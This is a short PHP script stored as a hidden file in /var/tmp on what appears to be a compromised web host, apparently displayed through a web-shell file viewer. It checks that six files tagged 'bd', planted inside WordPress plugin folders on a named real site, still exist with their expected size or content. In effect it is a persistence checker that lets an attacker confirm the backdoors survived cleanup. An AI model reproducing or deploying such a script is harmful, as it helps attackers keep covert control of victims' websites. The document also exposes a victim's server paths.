Current File : //var/tmp/.center
<?php   $r = '/home/mdkeenpw/shafqattraders.com'; $x = ["/wp-content/plugins/woocommerce/packages/email-editor/src/Integrations/Core/Renderer/Blocks/icons/x/tools.php"=>"bd@@111950357@@1798",
"/wp-content/plugins/foogallery/freemius/templates/plugin.php"=>"bd@@112005956@@1860",
"/wp-content/plugins/foogallery/freemius/templates/debug/index.php"=>"bd@@82551903@@data_storage",
"/wp-content/plugins/wgl-extensions/includes/meta-box/js/wp-color-picker-alpha/import.php"=>"bd@@112112783@@2507",
"/wp-content/plugins/wgl-extensions/includes/framework/redux-core/inc/validation/css/index.php"=>"bd@@80300718@@742",
"/wp-content/plugins/contact-form-7/modules/stripe/index.php"=>"bd@@112033376@@1591"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');